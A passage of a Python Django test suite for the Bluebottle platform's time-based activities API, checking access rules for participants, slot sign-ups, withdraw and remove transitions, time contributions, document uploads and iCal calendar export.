},
}
}
def test_update_owner(self):
response = self.client.patch(self.url, json.dumps(self.data), user=self.activity.owner)
self.assertEqual(response.status_code, status.HTTP_200_OK)
data = response.json()
for attr in ['start', 'duration', 'capacity']:
self.assertTrue(attr in data['data']['attributes'])
self.assertEqual(data['data']['meta']['status'], 'open')
activity = get_first_included_by_type(response, 'activities/time-based/dates')
self.assertTrue('errors' in activity['meta'])
self.assertTrue('required' in activity['meta'])
def test_update_other(self):
response = self.client.patch(
self.url, json.dumps(self.data), user=BlueBottleUserFactory.create()
)
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
def test_update_anonymous(self):
response = self.client.patch(self.url, json.dumps(self.data))
self.assertEqual(response.status_code, status.HTTP_401_UNAUTHORIZED)
def test_update_open_activity(self):
self.activity.initiative.states.submit()
self.activity.initiative.states.approve(save=True)
self.activity.states.submit(save=True)
response = self.client.patch(self.url, json.dumps(self.data), user=self.activity.owner)
self.assertEqual(response.status_code, status.HTTP_200_OK)
def test_get_owner(self):
response = self.client.get(self.url, user=self.activity.owner)
self.assertEqual(response.status_code, status.HTTP_200_OK)
data = response.json()
included = [{'id': resource['id'], 'type': resource['type']} for resource in data['included']]
for attr in ['start', 'duration', 'capacity']:
self.assertTrue(attr in data['data']['attributes'])
self.assertEqual(data['data']['meta']['status'], 'open')
self.assertTrue(
{'id': str(self.activity.pk), 'type': 'activities/time-based/dates'} in included
)
def test_get_other(self):
response = self.client.get(
self.url, user=BlueBottleUserFactory.create()
)
self.assertEqual(response.status_code, status.HTTP_200_OK)
def test_get_calendar_links(self):
self.slot.is_online = True
self.slot.online_meeting_url = 'http://example.com'
self.slot.save()
response = self.client.get(self.url, user=self.activity.owner)
self.assertEqual(response.status_code, status.HTTP_200_OK)
links = response.json()['data']['attributes']['links']
self.assertTrue(
urllib.parse.quote_plus(self.slot.online_meeting_url) in links['google']
)
self.assertTrue(
'https://calendar.google.com/calendar/render?action=TEMPLATE' in links['google']
)
self.assertTrue(
links['ical'].startswith(
reverse('slot-ical', args=(self.slot.pk,))
)
)
def test_closed_site(self):
MemberPlatformSettings.objects.update(closed=True)
group = Group.objects.get(name='Anonymous')
group.permissions.remove(Permission.objects.get(codename='api_read_dateactivity'))
response = self.client.get(self.url)
self.assertEqual(response.status_code, status.HTTP_401_UNAUTHORIZED)
def test_get_anonymous(self):
response = self.client.get(self.url)
self.assertEqual(response.status_code, status.HTTP_200_OK)
def test_get_open_activity(self):
self.activity.initiative.states.submit()
self.activity.initiative.states.approve(save=True)
self.activity.states.submit(save=True)
response = self.client.get(self.url, user=self.activity.owner)
self.assertEqual(response.status_code, status.HTTP_200_OK)
def test_delete_owner(self):
response = self.client.delete(self.url, user=self.activity.owner)
self.assertEqual(response.status_code, status.HTTP_204_NO_CONTENT)
def test_delete_other(self):
response = self.client.delete(
self.url, user=BlueBottleUserFactory.create()
)
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
def test_delete_anonymous(self):
response = self.client.delete(self.url)
self.assertEqual(response.status_code, status.HTTP_401_UNAUTHORIZED)
def test_delete_open_activity(self):
self.activity.initiative.states.submit()
self.activity.initiative.states.approve(save=True)
self.activity.states.submit(save=True)
response = self.client.delete(self.url, user=self.activity.owner)
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
class ParticipantListViewTestCase():
def setUp(self):
super().setUp()
self.client = JSONAPITestClient()
self.user = BlueBottleUserFactory()
self.activity = self.factory.create()
self.url = reverse(self.url_name)
self.private_document_url = reverse('private-document-list')
self.png_document_path = './bluebottle/files/tests/files/test-image.png'
self.data = {
'data': {
'type': self.participant_type,
'attributes': {
'motivation': 'I am great',
},
'relationships': {
'activity': {
'data': {
'type': 'activities/time-based/{}s'.format(self.type),
'id': self.activity.pk
}
}
}
}
}
def test_create(self):
self.response = self.client.post(self.url, json.dumps(self.data), user=self.user)
self.assertEqual(self.response.status_code, status.HTTP_201_CREATED)
data = self.response.json()['data']
self.assertEqual(
data['relationships']['user']['data']['id'],
str(self.user.pk)
)
self.assertEqual(
data['meta']['permissions']['GET'],
True
)
self.assertEqual(
data['meta']['permissions']['PUT'],
True
)
self.assertEqual(
data['meta']['permissions']['PATCH'],
True
)
def test_create_with_document(self):
with open(self.png_document_path, 'rb') as test_file:
document_response = self.client.post(
self.private_document_url,
test_file.read(),
content_type="image/png",
HTTP_CONTENT_DISPOSITION='attachment; filename="test.png"',
user=self.user
)
self.assertEqual(document_response.status_code, 201)
document_data = json.loads(document_response.content)
self.data['data']['relationships']['document'] = {
'data': {
'type': 'private-documents',
'id': document_data['data']['id']
}
}
response = self.client.post(self.url, json.dumps(self.data), user=self.user)
self.assertEqual(response.status_code, 201)
data = response.json()['data']
self.assertEqual(
data['relationships']['document']['data']['id'],
document_data['data']['id']
)
private_doc = self.included_by_type(response, 'private-documents')[0]
self.assertTrue(
private_doc['attributes']['link'].startswith(
'{}?signature='.format(reverse(self.document_url_name, args=(data['id'],)))
)
)
def test_create_duplicate(self):
self.client.post(self.url, json.dumps(self.data), user=self.user)
response = self.client.post(self.url, json.dumps(self.data), user=self.user)
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
self.assertEqual(
response.json()['errors'][0]['detail'],
'The fields activity, user must make a unique set.'
)
def test_create_anonymous(self):
response = self.client.post(self.url, json.dumps(self.data))
self.assertEqual(response.status_code, status.HTTP_401_UNAUTHORIZED)
def test_get_participants(self):
self.test_create()
self.response = self.client.get(self.url)
self.assertEqual(self.response.status_code, status.HTTP_200_OK)
class DateParticipantListAPIViewTestCase(ParticipantListViewTestCase, BluebottleTestCase):
type = 'date'
factory = DateActivityFactory
participant_factory = DateParticipantFactory
document_url_name = 'date-participant-document'
application_type = 'contributions/time-based/date-participants'
url_name = 'date-participant-list'
participant_type = 'contributors/time-based/date-participants'
def test_create(self):
super().test_create()
types = [included['type'] for included in self.response.json()['included']]
self.assertTrue('contributors/time-based/slot-participants' in types)
def test_get_participants(self):
super().test_get_participants()
types = [included['type'] for included in self.response.json()['included']]
self.assertFalse('contributors/time-based/slot-participants' in types)
class PeriodParticipantListAPIViewTestCase(ParticipantListViewTestCase, BluebottleTestCase):
type = 'period'
factory = PeriodActivityFactory
participant_factory = PeriodParticipantFactory
url_name = 'period-participant-list'
document_url_name = 'period-participant-document'
participant_type = 'contributors/time-based/period-participants'


class ParticipantDetailViewTestCase():
    def setUp(self):
        super().setUp()
        self.client = JSONAPITestClient()
        self.user = BlueBottleUserFactory()
        self.activity = self.factory.create()
        self.participant = self.participant_factory(
            activity=self.activity,
            motivation='My motivation'
        )
        self.url = reverse(self.url_name, args=(self.participant.pk,))
        self.private_document_url = reverse('private-document-list')
        self.png_document_path = './bluebottle/files/tests/files/test-image.png'

        self.data = {
            'data': {
                'type': self.participant_type,
                'id': self.participant.pk,
                'attributes': {'motivation': 'Let\'s go!!!'},
            }
        }

    def test_get_user(self):
        response = self.client.get(self.url, user=self.participant.user)
        self.assertEqual(response.status_code, status.HTTP_200_OK)

        data = response.json()['data']
        self.assertEqual(
            data['attributes']['motivation'],
            self.participant.motivation
        )
        self.assertEqual(
            data['relationships']['user']['data']['id'],
            str(self.participant.user.pk)
        )
        self.assertEqual(
            data['meta']['permissions']['GET'],
            True
        )
        self.assertEqual(
            data['meta']['permissions']['PUT'],
            True
        )
        self.assertEqual(
            data['meta']['permissions']['PATCH'],
            True
        )
        self.assertTrue(
            {'name': 'withdraw', 'target': 'withdrawn', 'available': True}
            in data['meta']['transitions']
        )

    def test_get_owner(self):
        response = self.client.get(self.url, user=self.activity.owner)
        self.assertEqual(response.status_code, status.HTTP_200_OK)

        self.data = response.json()['data']
        self.assertEqual(
            self.data['attributes']['motivation'],
            self.participant.motivation
        )
        self.assertFalse(
            {'name': 'withdraw', 'target': 'withdrawn', 'available': True}
            in self.data['meta']['transitions']
        )
        self.assertTrue(
            {'name': 'remove', 'target': 'rejected', 'available': True}
            in self.data['meta']['transitions']
        )

    def test_get_activity_manager(self):
        response = self.client.get(self.url, user=self.activity.initiative.activity_managers.first())
        self.assertEqual(response.status_code, status.HTTP_200_OK)

        data = response.json()['data']
        self.assertEqual(
            data['attributes']['motivation'],
            self.participant.motivation
        )

    def test_get_other_user(self):
        response = self.client.get(self.url, user=self.user)
        self.assertEqual(response.status_code, status.HTTP_200_OK)

        data = response.json()['data']
        self.assertIsNone(
            data['attributes']['motivation']
        )

    def test_patch_user(self):
        response = self.client.patch(self.url, json.dumps(self.data), user=self.participant.user)
        self.assertEqual(response.status_code, status.HTTP_200_OK)

        data = response.json()['data']
        self.assertEqual(
            data['attributes']['motivation'],
            self.data['data']['attributes']['motivation']
        )

    def test_patch_document(self):
        with open(self.png_document_path, 'rb') as test_file:
            document_response = self.client.post(
                self.private_document_url,
                test_file.read(),
                content_type="image/png",
                HTTP_CONTENT_DISPOSITION='attachment; filename="test.rtf"',
                user=self.user
            )
        self.assertEqual(document_response.status_code, 201)
        document_data = json.loads(document_response.content)

        self.data['data']['relationships'] = {
            'document': {
                'data': {
                    'type': 'private-documents',
                    'id': document_data['data']['id']
                }
            }
        }
        response = self.client.patch(self.url, json.dumps(self.data), user=self.participant.user)
        self.assertEqual(response.status_code, status.HTTP_200_OK)

        data = response.json()['data']
        self.assertEqual(
            data['relationships']['document']['data']['id'],
            document_data['data']['id']
        )

    def test_patch_other_user(self):
        response = self.client.patch(self.url, json.dumps(self.data), user=self.user)
        self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)

    def test_patch_anonymous(self):
        response = self.client.patch(self.url, json.dumps(self.data))
        self.assertEqual(response.status_code, status.HTTP_401_UNAUTHORIZED)


class DateParticipantDetailAPIViewTestCase(ParticipantDetailViewTestCase, BluebottleTestCase):
    type = 'date'
    factory = DateActivityFactory
    participant_factory = DateParticipantFactory
    url_name = 'date-participant-detail'
    participant_type = 'contributors/time-based/date-participants'


class PeriodParticipantDetailAPIViewTestCase(ParticipantDetailViewTestCase, BluebottleTestCase):
    type = 'period'
    factory = PeriodActivityFactory
    participant_factory = PeriodParticipantFactory
    url_name = 'period-participant-detail'
    participant_type = 'contributors/time-based/period-participants'

    def test_get_owner(self):
        super().test_get_owner()
        self.assertTrue(
            {'name': 'remove', 'target': 'rejected', 'available': True}
            in self.data['meta']['transitions']
        )


class ParticipantTransitionAPIViewTestCase():
    def setUp(self):
        super().setUp()
        self.client = JSONAPITestClient()
        self.user = BlueBottleUserFactory()
        self.activity = self.factory.create()
        self.participant = self.participant_factory.create(
            activity=self.activity
        )

        self.url = reverse(self.url_name)
        self.data = {
            'data': {
                'type': '{}-transitions'.format(self.participant_type),
                'attributes': {},
                'relationships': {
                    'resource': {
                        'data': {
                            'type': '{}s'.format(self.participant_type),
                            'id': self.participant.pk
                        }
                    }
                }
            }
        }

    def test_withdraw_by_user(self):
        # A participant can withdraw their own contribution
        self.data['data']['attributes']['transition'] = 'withdraw'
        response = self.client.post(
            self.url,
            json.dumps(self.data),
            user=self.participant.user
        )
        self.assertEqual(response.status_code, status.HTTP_201_CREATED)

        data = json.loads(response.content)
        participant = [
            include for include in data['included'] if include['type'] == '{}s'.format(self.participant_type)
        ]
        self.assertEqual(len(participant), 1)
        self.assertEqual(participant[0]['attributes']['status'], 'withdrawn')

    def test_withdraw_by_other_user(self):
        # Another user cannot withdraw someone else's contribution
        self.data['data']['attributes']['transition'] = 'withdraw'
        response = self.client.post(
            self.url,
            json.dumps(self.data),
            user=self.user
        )
        self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)

    def test_remove_by_activity_owner(self):
        # The activity owner can remove a participant
        self.data['data']['attributes']['transition'] = 'remove'
        response = self.client.post(
            self.url,
            json.dumps(self.data),
            user=self.activity.owner
        )
        self.assertEqual(response.status_code, status.HTTP_201_CREATED)

        data = json.loads(response.content)
        participant = [
            include for include in data['included'] if include['type'] == '{}s'.format(self.participant_type)
        ]
        self.assertEqual(len(participant), 1)
        self.assertEqual(participant[0]['attributes']['status'], 'rejected')

    def test_remove_by_user(self):
        # A participant cannot remove themselves
        self.data['data']['attributes']['transition'] = 'remove'
        response = self.client.post(
            self.url,
            json.dumps(self.data),
            user=self.participant.user
        )
        self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)


class DateParticipantTransitionAPIViewTestCase(ParticipantTransitionAPIViewTestCase, BluebottleTestCase):
    type = 'date'
    url_name = 'date-participant-transition-list'
    participant_type = 'contributors/time-based/date-participant'
    factory = DateActivityFactory
    participant_factory = DateParticipantFactory


class PeriodParticipantTransitionAPIViewTestCase(ParticipantTransitionAPIViewTestCase, BluebottleTestCase):
    type = 'period'
    participant_type = 'contributors/time-based/period-participant'
    url_name = 'period-participant-transition-list'
    factory = PeriodActivityFactory
    participant_factory = PeriodParticipantFactory


class ReviewParticipantTransitionAPIViewTestCase():
    def setUp(self):
        super().setUp()
        self.client = JSONAPITestClient()
        self.user = BlueBottleUserFactory()
        self.activity = self.factory.create(review=True)
        self.participant = self.participant_factory.create(
            activity=self.activity
        )

        self.url = reverse(self.url_name)
        self.data = {
            'data': {
                'type': '{}-transitions'.format(self.participant_type),
                'attributes': {},
                'relationships': {
                    'resource': {
                        'data': {
                            'type': '{}s'.format(self.participant_type),
                            'id': self.participant.pk
                        }
                    }
                }
            }
        }

    def test_withdraw_by_user(self):
        # A participant can withdraw their own contribution
        self.data['data']['attributes']['transition'] = 'withdraw'
        response = self.client.post(
            self.url,
            json.dumps(self.data),
            user=self.participant.user
        )
        self.assertEqual(response.status_code, status.HTTP_201_CREATED)

        data = json.loads(response.content)
        participant = [
            include for include in data['included'] if include['type'] == '{}s'.format(self.participant_type)
        ]
        self.assertEqual(len(participant), 1)
        self.assertEqual(participant[0]['attributes']['status'], 'withdrawn')

    def test_withdraw_by_other_user(self):
        # Another user cannot withdraw someone else's contribution
        self.data['data']['attributes']['transition'] = 'withdraw'
        response = self.client.post(
            self.url,
            json.dumps(self.data),
            user=self.user
        )
        self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)

    def test_reject_by_activity_owner(self):
        # The activity owner can reject a participant
        self.data['data']['attributes']['transition'] = 'reject'
        response = self.client.post(
            self.url,
            json.dumps(self.data),
            user=self.activity.owner
        )
        self.assertEqual(response.status_code, status.HTTP_201_CREATED)

        data = json.loads(response.content)
        participant = [
            include for include in data['included'] if include['type'] == '{}s'.format(self.participant_type)
        ]
        self.assertEqual(len(participant), 1)
        self.assertEqual(participant[0]['attributes']['status'], 'rejected')

    def test_reject_by_user(self):
        # A participant cannot reject themselves
        self.data['data']['attributes']['transition'] = 'reject'
        response = self.client.post(
            self.url,
            json.dumps(self.data),
            user=self.participant.user
        )
        self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)


class DateReviewParticipantTransitionAPIViewTestCase(
    ReviewParticipantTransitionAPIViewTestCase, BluebottleTestCase
):
    type = 'date'
    url_name = 'date-participant-transition-list'
    participant_type = 'contributors/time-based/date-participant'
    factory = DateActivityFactory
    participant_factory = DateParticipantFactory


class PeriodReviewParticipantTransitionAPIViewTestCase(
    ReviewParticipantTransitionAPIViewTestCase, BluebottleTestCase
):
    type = 'period'
    participant_type = 'contributors/time-based/period-participant'
    url_name = 'period-participant-transition-list'
    factory = PeriodActivityFactory
    participant_factory = PeriodParticipantFactory


class RelatedParticipantsAPIViewTestCase():
    def setUp(self):
        super().setUp()
        self.client = JSONAPITestClient()
        self.activity = self.factory.create()

        self.participants = []
        for i in range(10):
            self.participants.append(
                self.participant_factory.create(
                    activity=self.activity,
                    document=PrivateDocumentFactory.create()
                )
            )
        self.participants[0].states.remove(save=True)
        self.participants[1].states.remove(save=True)

        self.url = reverse(self.url_name, args=(self.activity.pk,))

    def test_get_owner(self):
        self.response = self.client.get(self.url, user=self.activity.owner)
        self.assertEqual(self.response.status_code, status.HTTP_200_OK)
        self.assertEqual(len(self.response.json()['data']), 10)

        included_documents = self.included_by_type(self.response, 'private-documents')
        self.assertEqual(len(included_documents), 10)

    def test_get_with_duplicate_files(self):
        file = PrivateDocumentFactory.create(owner=self.participants[2].user)
        self.participants[2].document = file
        self.participants[2].save()

        self.participants[3].document = file
        self.participants[3].save()

        self.response = self.client.get(self.url, user=self.activity.owner)
        self.assertEqual(self.response.status_code, status.HTTP_200_OK)
        self.assertEqual(len(self.response.json()['data']), 10)

        included_documents = self.included_by_type(self.response, 'private-documents')
        self.assertEqual(len(included_documents), 9)

    def test_get_anonymous(self):
        self.response = self.client.get(self.url)
        self.assertEqual(self.response.status_code, status.HTTP_200_OK)
        self.assertEqual(len(self.response.json()['data']), 8)

        included_documents = self.included_by_type(self.response, 'private-documents')
        self.assertEqual(len(included_documents), 0)

    def test_get_removed_participant(self):
        self.response = self.client.get(self.url, user=self.participants[0].user)
        self.assertEqual(self.response.status_code, status.HTTP_200_OK)
        self.assertEqual(len(self.response.json()['data']), 9)

        included_documents = self.included_by_type(self.response, 'private-documents')
        self.assertEqual(len(included_documents), 1)

    def test_get_closed_site(self):
        MemberPlatformSettings.objects.update(closed=True)
        group = Group.objects.get(name='Anonymous')
        group.permissions.remove(Permission.objects.get(codename='api_read_dateparticipant'))
        group.permissions.remove(Permission.objects.get(codename='api_read_periodparticipant'))

        response = self.client.get(self.url)
        self.assertEqual(response.status_code, status.HTTP_401_UNAUTHORIZED)


class RelatedDateParticipantAPIViewTestCase(RelatedParticipantsAPIViewTestCase, BluebottleTestCase):
    type = 'date'
    url_name = 'date-participants'
    participant_type = 'contributors/time-based/date-participant'
    factory = DateActivityFactory
    participant_factory = DateParticipantFactory

    def setUp(self):
        super().setUp()
        self.client = JSONAPITestClient()
        self.activity = self.factory.create(slot_selection='free')
        DateActivitySlotFactory.create(activity=self.activity)

        self.participants = []
        for i in range(10):
            participant = self.participant_factory.create(
                activity=self.activity,
                document=PrivateDocumentFactory.create()
            )
            for slot in self.activity.slots.all():
                SlotParticipantFactory.create(
                    participant=participant,
                    slot=slot
                )
            self.participants.append(
                participant
            )
        self.participants[0].states.remove(save=True)
        self.participants[1].states.remove(save=True)
        self.participants[2].slot_participants.all()[0].states.remove(save=True)

        self.url = reverse(self.url_name, args=(self.activity.pk,))

    def test_get_owner(self):
        super().test_get_owner()
        self.assertEqual(len(self.response.data), 10)
        self.assertEqual(self.response.data[0]['permissions']['PUT'], True)

    def test_get_anonymous(self):
        super().test_get_anonymous()
        self.assertEqual(len(self.response.data), 8)
        self.assertEqual(self.response.data[0]['permissions']['PUT'], False)

    def test_get_removed_participant(self):
        super().test_get_removed_participant()
        self.assertEqual(len(self.response.data), 9)


class RelatedPeriodParticipantAPIViewTestCase(RelatedParticipantsAPIViewTestCase, BluebottleTestCase):
    type = 'period'
    url_name = 'period-participants'
    participant_type = 'contributors/time-based/period-participant'
    factory = PeriodActivityFactory
    participant_factory = PeriodParticipantFactory

    def test_get_owner(self):
        super().test_get_owner()
        included_contributions = self.included_by_type(self.response, 'contributions/time-contributions')
        self.assertEqual(len(included_contributions), 10)


class SlotParticipantListAPIViewTestCase(BluebottleTestCase):
    def setUp(self):
        super().setUp()
        self.client = JSONAPITestClient()
        self.activity = DateActivityFactory.create(review=False, slot_selection='free')
        self.slot = DateActivitySlotFactory.create(activity=self.activity)
        self.participant = DateParticipantFactory.create(activity=self.activity)

        self.url = reverse('slot-participant-list')
        self.data = {
            'data': {
                'type': 'contributors/time-based/slot-participants',
                'relationships': {
                    'slot': {
                        'data': {
                            'type': 'activities/time-based/date-slots', 'id': self.slot.id
                        },
                    },
                    'participant': {
                        'data': {
                            'type': 'contributors/time-based/date-participants',
                            'id': self.participant.id
                        },
                    },
                }
            }
        }

    def test_create_participant_user(self):
        response = self.client.post(self.url, json.dumps(self.data), user=self.participant.user)
        self.assertEqual(response.status_code, status.HTTP_201_CREATED)

        data = response.json()['data']
        self.assertEqual(
            data['relationships']['slot']['data']['id'], str(self.slot.pk)
        )
        self.assertEqual(
            data['relationships']['participant']['data']['id'], str(self.participant.pk)
        )
        self.assertEqual(data['id'], str(self.participant.slot_participants.get().pk))

    def test_create_participant_user_full(self):
        self.slot.capacity = 1
        self.slot.save()
        SlotParticipantFactory.create(slot=self.slot)

        response = self.client.post(self.url, json.dumps(self.data), user=self.participant.user)
        self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)

    def test_create_participant_user_twice(self):
        response = self.client.post(self.url, json.dumps(self.data), user=self.participant.user)
        self.assertEqual(response.status_code, status.HTTP_201_CREATED)

        response = self.client.post(self.url, json.dumps(self.data), user=self.participant.user)
        self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)

    def test_create_different_user(self):
        response = self.client.post(self.url, json.dumps(self.data), user=BlueBottleUserFactory.create())
        self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)

    def test_create_activity_owner(self):
        response = self.client.post(self.url, json.dumps(self.data), user=self.activity.owner)
        self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)

    def test_create_no_user(self):
        response = self.client.post(self.url, json.dumps(self.data))
        self.assertEqual(response.status_code, status.HTTP_401_UNAUTHORIZED)

    def test_create_different_slot(self):
        activity = DateActivityFactory.create()
        slot = DateActivitySlotFactory.create(activity=activity)
        self.data['data']['relationships']['slot']['data']['id'] = slot.pk

        response = self.client.post(self.url, json.dumps(self.data), user=self.participant.user)
        self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)

    def test_create_missing_slot(self):
        del self.data['data']['relationships']['slot']

        response = self.client.post(self.url, json.dumps(self.data), user=self.participant.user)
        self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)

    def test_create_missing_participant(self):
        del self.data['data']['relationships']['participant']

        response = self.client.post(self.url, json.dumps(self.data), user=self.participant.user)
        self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)


class SlotParticipantDetailAPIViewTestCase(BluebottleTestCase):
    def setUp(self):
        super().setUp()
        self.client = JSONAPITestClient()
        self.owner = BlueBottleUserFactory.create()
        self.random_user = BlueBottleUserFactory.create()
        self.supporter1 = BlueBottleUserFactory.create()
        self.supporter2 = BlueBottleUserFactory.create()
        self.activity = DateActivityFactory.create(
            review=False,
            owner=self.owner
        )
        self.slot = DateActivitySlotFactory.create(activity=self.activity)
        self.participant1 = DateParticipantFactory.create(
            user=self.supporter1,
            activity=self.activity
        )
        self.participant2 = DateParticipantFactory.create(
            user=self.supporter2,
            activity=self.activity
        )
        self.participant2.states.withdraw(save=True)

        p1_sl1 = SlotParticipant.objects.get(slot=self.slot, participant=self.participant1)
        p2_sl1 = SlotParticipant.objects.get(slot=self.slot, participant=self.participant2)
        self.url_part1_slot1 = reverse('slot-participant-detail', args=(p1_sl1.id,))
        self.url_part2_slot1 = reverse('slot-participant-detail', args=(p2_sl1.id,))

    def test_get_slot_participant(self):
        MemberPlatformSettings.objects.update(closed=True)
        response = self.client.get(self.url_part1_slot1, user=self.supporter1)
        self.assertEqual(response.status_code, status.HTTP_200_OK)

        response = self.client.get(self.url_part2_slot1, user=self.supporter1)
        self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)

        response = self.client.get(self.url_part1_slot1, user=self.owner)
        self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)

        response = self.client.get(self.url_part2_slot1, user=self.random_user)
        self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)


class SlotParticipantTransitionAPIViewTestCase(BluebottleTestCase):
    def setUp(self):
        super().setUp()
        self.client = JSONAPITestClient()
        self.activity = DateActivityFactory.create()
        self.slot = DateActivitySlotFactory.create(activity=self.activity)
        self.participant = DateParticipantFactory.create(activity=self.activity)
        self.slot_participant = self.participant.slot_participants.get(
            participant=self.participant, slot=self.slot
        )

        self.url = reverse('slot-participant-transition-list')
        self.data = {
            'data': {
                'type': 'contributors/time-based/slot-participant-transitions',
                'attributes': {},
                'relationships': {
                    'resource': {
                        'data': {
                            'type': 'contributors/time-based/slot-participants',
                            'id': self.slot_participant.pk
                        }
                    }
                }
            }
        }

    def test_withdraw_by_user(self):
        self.data['data']['attributes']['transition'] = 'withdraw'
        response = self.client.post(
            self.url,
            json.dumps(self.data),
            user=self.participant.user
        )
        self.assertEqual(response.status_code, status.HTTP_201_CREATED)

        data = json.loads(response.content)
        self.assertEqual(
            data['included'][2]['type'],
            'contributors/time-based/slot-participants'
        )
        self.assertEqual(data['included'][2]['meta']['status'], 'withdrawn')

    def test_reapply_by_user(self):
        self.test_withdraw_by_user()

        self.data['data']['attributes']['transition'] = 'reapply'
        response = self.client.post(
            self.url,
            json.dumps(self.data),
            user=self.participant.user
        )
        self.assertEqual(response.status_code, status.HTTP_201_CREATED)

        data = json.loads(response.content)
        self.assertEqual(data['included'][2]['meta']['status'], 'registered')

    def test_withdraw_by_owner(self):
        self.data['data']['attributes']['transition'] = 'withdraw'
        response = self.client.post(
            self.url,
            json.dumps(self.data),
            user=self.activity.owner
        )
        self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)

    def test_reapply_by_owner(self):
        self.test_withdraw_by_user()

        self.data['data']['attributes']['transition'] = 'reapply'
        response = self.client.post(
            self.url,
            json.dumps(self.data),
            user=self.activity.owner
        )
        self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)

    def test_remove_by_owner(self):
        self.data['data']['attributes']['transition'] = 'remove'
        response = self.client.post(
            self.url,
            json.dumps(self.data),
            user=self.activity.owner
        )
        self.assertEqual(response.status_code, status.HTTP_201_CREATED)

        data = json.loads(response.content)
        self.assertEqual(data['included'][2]['meta']['status'], 'removed')

    def test_accept_by_owner(self):
        self.test_remove_by_owner()

        self.data['data']['attributes']['transition'] = 'accept'
        response = self.client.post(
            self.url,
            json.dumps(self.data),
            user=self.activity.owner
        )
        self.assertEqual(response.status_code, status.HTTP_201_CREATED)

        data = json.loads(response.content)
        self.assertEqual(data['included'][2]['meta']['status'], 'registered')

    def test_remove_by_user(self):
        self.data['data']['attributes']['transition'] = 'remove'
        response = self.client.post(
            self.url,
            json.dumps(self.data),
            user=self.participant.user
        )
        self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)

    def test_accept_by_user(self):
        self.test_remove_by_owner()

        self.data['data']['attributes']['transition'] = 'accept'
        response = self.client.post(
            self.url,
            json.dumps(self.data),
            user=self.participant.user
        )
        self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)


class TimeContributionDetailAPIViewTestCase():
    def setUp(self):
        super().setUp()
        self.client = JSONAPITestClient()
        self.activity = self.factory.create()
        self.participant = self.participant_factory.create(
            activity=self.activity
        )
        self.contribution = self.participant.contributions.get()

        self.url = reverse(
            'time-contribution-detail',
            args=(self.contribution.pk,)
        )
        self.data = {
            'data': {
                'type': 'contributions/time-contributions',
                'id': self.contribution.pk,
                'attributes': {
                    'value': '5:00:00'
                }
            }
        }

    def test_get_owner(self):
        response = self.client.get(self.url, user=self.activity.owner)
        self.assertEqual(response.status_code, status.HTTP_200_OK)
        self.assertTrue(
            response.json()['data']['meta']['permissions']['PUT']
        )

    def test_get_contributor(self):
        response = self.client.get(self.url, user=self.participant.user)
        self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)

    def test_get_other(self):
        response = self.client.get(self.url, user=BlueBottleUserFactory.create())
        self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)

    def test_get_anonymous(self):
        response = self.client.get(self.url)
        self.assertEqual(response.status_code, status.HTTP_401_UNAUTHORIZED)

    def test_put_owner(self):
        response = self.client.put(self.url, json.dumps(self.data), user=self.activity.owner)
        self.assertEqual(response.status_code, status.HTTP_200_OK)

        self.contribution.refresh_from_db()
        self.assertEqual(self.contribution.value, timedelta(hours=5))

    def test_put_contributor(self):
        response = self.client.put(self.url, json.dumps(self.data), user=self.participant.user)
        self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)

    def test_put_other(self):
        response = self.client.put(self.url, json.dumps(self.data), user=BlueBottleUserFactory.create())
        self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)

    def test_put_anonymous(self):
        response = self.client.put(self.url, json.dumps(self.data))
        self.assertEqual(response.status_code, status.HTTP_401_UNAUTHORIZED)


class DateTimeContributionAPIViewTestCase(TimeContributionDetailAPIViewTestCase, BluebottleTestCase):
    factory = DateActivityFactory
    participant_factory = DateParticipantFactory


class PeriodTimeContributionAPIViewTestCase(TimeContributionDetailAPIViewTestCase, BluebottleTestCase):
    factory = PeriodActivityFactory
    participant_factory = PeriodParticipantFactory


class SlotIcalTestCase(BluebottleTestCase):
    def setUp(self):
        super().setUp()
        self.user = BlueBottleUserFactory.create()
        self.client = JSONAPITestClient()
        self.initiative = InitiativeFactory.create(status='approved')
        self.activity = DateActivityFactory.create(
            title='Pollute Katwijk Beach',
            owner=self.user,
            initiative=self.initiative
        )
        self.slot = self.activity.slots.first()
        self.slot.is_online = True
        self.slot.online_meeting_url = 'http://example.com'
        self.slot.save()
        self.slot_url = reverse('date-slot-detail', args=(self.slot.pk,))

        self.activity.states.submit(save=True)

        response = self.client.get(self.slot_url, user=self.user)
        self.signed_url = response.json()['data']['attributes']['links']['ical']
        self.unsigned_url = reverse('slot-ical', args=(self.activity.pk,))

    def test_get(self):
        response = self.client.get(self.signed_url)
        self.assertEqual(response.status_code, status.HTTP_200_OK)
        self.assertEqual(response.get('content-type'), 'text/calendar')
        self.assertEqual(
            response.get('content-disposition'),
            'attachment; filename="{}.ics"'.format(self.activity.slug)
        )

        calendar = icalendar.Calendar.from_ical(response.content)
        for ical_event in calendar.walk('vevent'):
            self.assertAlmostEqual(
                ical_event['dtstart'].dt,
                self.slot.start,
                delta=timedelta(seconds=10)
            )
            self.assertAlmostEqual(
                ical_event['dtend'].dt,
                self.slot.start + self.slot.duration,
                delta=timedelta(seconds=10)
            )
